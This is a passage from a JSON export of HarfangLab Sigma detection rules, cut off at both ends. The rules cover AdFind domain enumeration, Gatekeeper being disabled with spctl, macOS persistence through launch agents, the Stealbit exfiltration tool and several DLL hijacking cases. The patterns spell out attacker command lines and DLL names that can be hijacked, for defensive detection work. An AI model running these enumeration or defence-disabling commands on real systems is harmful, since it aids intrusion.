"content": "title: Active Directory Discovery via Adfind Detected\nid: 8ad5b489-e501-424e-b275-b55b2e88f3f0\ndescription: |\n Detects the usage of AdFind with specific commands to perform enumeration on Active Directory networks.\n AdFind is a tool that has been used by numerous threat actors during the discovery phase of attacks (for enumerating domain trusts, domain users, ...).\n It is recommended to verify that the usage of this tool is legitimate as well as to investigate the context of this execution.\nreferences:\n - https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/techniques/T1482/\n - https://attack.mitre.org/software/S0552/\ndate: 2023/06/29\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1482\n - attack.t1018\n - attack.s0552\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.AdFind\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n Image|endswith: '\\adfind.exe'\n\n selection_cmd:\n CommandLine|contains:\n - '-sc trustdmp'\n - '-sc admincountdmp'\n - 'objectclass=trusteddomain'\n - 'objectcategory=computer'\n - 'objectcategory=organizationalUnit'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8ad5b489-e501-424e-b275-b55b2e88f3f0",
"rule_name": "Active Directory Discovery via Adfind Detected",
"rule_description": "Detects the usage of AdFind with specific commands to perform enumeration on Active Directory networks.\nAdFind is a tool that has been used by numerous threat actors during the discovery phase of attacks (for enumerating domain trusts, domain users, ...).\nIt is recommended to verify that the usage of this tool is legitimate as well as to investigate the context of this execution.\n",
"rule_creation_date": "2023-06-29",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1482"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b0a2e0d-cdb5-47be-8565-33d07f66b4cb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617382Z",
"creation_date": "2026-03-23T11:45:34.617384Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617388Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/001/",
"https://attack.mitre.org/techniques/T1543/004/"
],
"name": "t1543_001_launch_agents_created_defaults.yml",
"content": "title: Launch Agent/Daemon Created via defaults\nid: 8b0a2e0d-cdb5-47be-8565-33d07f66b4cb\ndescription: |\n Detects the creation of a launch agent or daemon using defaults.\n Adversaries may build a plist from scratch using defaults in order to establish a means of persistence.\n It is recommended to check the content of the newly created plist file for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1543/001/\n - https://attack.mitre.org/techniques/T1543/004/\ndate: 2024/06/28\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.001\n - attack.t1543.004\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.LOLBin.Defaults\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Path|startswith:\n - '/System/Library/LaunchAgents/'\n - '/Library/LaunchAgents/'\n - '/Users/*/Library/LaunchAgents/'\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n - '/private/var/root/Library/LaunchAgents/'\n - '/Library/User Template/Library/LaunchAgents/'\n Kind: 'create'\n ProcessImage: '/usr/bin/defaults'\n\n condition: all of selection_*\nlevel: medium\n#level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b0a2e0d-cdb5-47be-8565-33d07f66b4cb",
"rule_name": "Launch Agent/Daemon Created via defaults",
"rule_description": "Detects the creation of a launch agent or daemon using defaults.\nAdversaries may build a plist from scratch using defaults in order to establish a means of persistence.\nIt is recommended to check the content of the newly created plist file for malicious content.\n",
"rule_creation_date": "2024-06-28",
"rule_modified_date": "2025-01-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.001",
"attack.t1543.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b15b564-b241-40f8-9265-2a8cd6e645ef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091645Z",
"creation_date": "2026-03-23T11:45:34.091647Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091651Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cybereason.com/blog/research/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1041_stealbit_named_pipe_created.yml",
"content": "title: Stealbit Named Pipe Created\nid: 8b15b564-b241-40f8-9265-2a8cd6e645ef\ndescription: |\n Detects the creation of a named pipe pertaining to Stealbit.\n Stealbit is a complex exfiltration tool used by the LockBit ransomware group.\n It uses named pipes to coordinate its exfiltration and data-mining threads.\n It is recommended to quickly look for other signs of cybercrime activity on the instance and to isolate infected machines.\nreferences:\n - https://www.cybereason.com/blog/research/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1041\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Malware.Stealbit\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName|endswith: '\\STEALBIT-MASTER-PIPE'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b15b564-b241-40f8-9265-2a8cd6e645ef",
"rule_name": "Stealbit Named Pipe Created",
"rule_description": "Detects the creation of a named pipe pertaining to Stealbit.\nStealbit is a complex exfiltration tool used by the LockBit ransomware group.\nIt uses named pipes to coordinate its exfiltration and data-mining threads.\nIt is recommended to quickly look for other signs of cybercrime activity on the instance and to isolate infected machines.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1041",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b2bdeee-449e-44d1-a27b-e97ae34dfc75",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617220Z",
"creation_date": "2026-03-23T11:45:34.617222Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617226Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md",
"https://support.apple.com/fr-fr/guide/security/sec5599b66df/web",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_gatekeeper.yml",
"content": "title: Gatekeeper Disabled\nid: 8b2bdeee-449e-44d1-a27b-e97ae34dfc75\ndescription: |\n Detects the execution of spctl to disable Apple Gatekeeper.\n Apple Gatekeeper is a mechanism that ensures that software comes from recognized developers, is notarized by Apple as malware-free, and remains unaltered.\n Apple Gatekeeper also requests user approval before opening downloaded software for the first time.\n It is recommended to investigate the process that disabled Apple Gatekeeper to determine if this action was legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md\n - https://support.apple.com/fr-fr/guide/security/sec5599b66df/web\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2022/07/19\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: '/spctl'\n CommandLine|contains:\n - '--master-disable'\n - '--global-disable'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b2bdeee-449e-44d1-a27b-e97ae34dfc75",
"rule_name": "Gatekeeper Disabled",
"rule_description": "Detects the execution of spctl to disable Apple Gatekeeper.\nApple Gatekeeper is a mechanism that ensures that software comes from recognized developers, is notarized by Apple as malware-free, and remains unaltered.\nApple Gatekeeper also requests user approval before opening downloaded software for the first time.\nIt is recommended to investigate the process that disabled Apple Gatekeeper to determine if this action was legitimate.\n",
"rule_creation_date": "2022-07-19",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b3c8941-bca5-4ccf-b8d6-2994c01654be",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091299Z",
"creation_date": "2026-03-23T11:45:34.091301Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091306Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mfpmp.yml",
"content": "title: DLL Hijacking via mfpmp.exe\nid: 8b3c8941-bca5-4ccf-b8d6-2994c01654be\ndescription: |\n Detects potential Windows DLL Hijacking via mfpmp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mfpmp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\ksuser.dll'\n - '\\MFCORE.dll'\n - '\\MFPlat.DLL'\n - '\\RTWorkQ.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b3c8941-bca5-4ccf-b8d6-2994c01654be",
"rule_name": "DLL Hijacking via mfpmp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mfpmp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b4b8b05-41f2-47f7-afa9-bb3b85ba5bbb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094376Z",
"creation_date": "2026-03-23T11:45:34.094378Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094383Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pwmtower.yml",
"content": "title: DLL Hijacking via PwmTower.exe\nid: 8b4b8b05-41f2-47f7-afa9-bb3b85ba5bbb\ndescription: |\n Detects potential Windows DLL Hijacking via PwmTower.exe related to Trend Micro Password Manager.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessSignature: 'Trend Micro, Inc.'\n ImageLoaded|endswith:\n - '\\nw.dll'\n - '\\nw_elf.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Trend Micro\\'\n - '?:\\Program Files (x86)\\Trend Micro\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Trend Micro\\'\n - '?:\\Program Files (x86)\\Trend Micro\\'\n - '?:\\Windows\\System32\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b4b8b05-41f2-47f7-afa9-bb3b85ba5bbb",
"rule_name": "DLL Hijacking via PwmTower.exe",
"rule_description": "Detects potential Windows DLL Hijacking via PwmTower.exe related to Trend Micro Password Manager.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b5755ff-0a81-449e-afca-7667f8295733",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080631Z",
"creation_date": "2026-03-23T11:45:34.080633Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080637Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_msbuild.yml",
"content": "title: MSBuild.exe Sacrificial Process Spawned\nid: 8b5755ff-0a81-449e-afca-7667f8295733\ndescription: |\n Detects the suspicious execution of the legitimate MSBuild.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n It is recommended to investigate the parent process performing this action and the destination IP address of the MSBuild.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/07/16\nmodified: 2025/09/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\MSBuild.exe'\n CommandLine|endswith: '\\MSBuild.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b5755ff-0a81-449e-afca-7667f8295733",
"rule_name": "MSBuild.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate MSBuild.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the MSBuild.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2025-07-16",
"rule_modified_date": "2025-09-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b5eb879-9366-4765-b123-05a176322908",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588969Z",
"creation_date": "2026-03-23T11:45:34.588975Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588985Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_searchprotocolhost.yml",
"content": "title: DLL Hijacking via SearchProtocolHost.exe\nid: 8b5eb879-9366-4765-b123-05a176322908\ndescription: |\n Detects potential Windows DLL Hijacking via SearchProtocolHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SearchProtocolHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\msftedit.dll'\n - '\\mstracer.dll'\n - '\\tquery.dll'\n - '\\msfte.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b5eb879-9366-4765-b123-05a176322908",
"rule_name": "DLL Hijacking via SearchProtocolHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via SearchProtocolHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b6296a9-d84f-4b67-bfee-392455db965e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601288Z",
"creation_date": "2026-03-23T11:45:34.601291Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601299Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_csvd.yml",
"content": "title: DLL Hijacking via csvd.exe\nid: 8b6296a9-d84f-4b67-bfee-392455db965e\ndescription: |\n Detects potential Windows DLL Hijacking via csvd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'csvde.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dsrole.dll'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
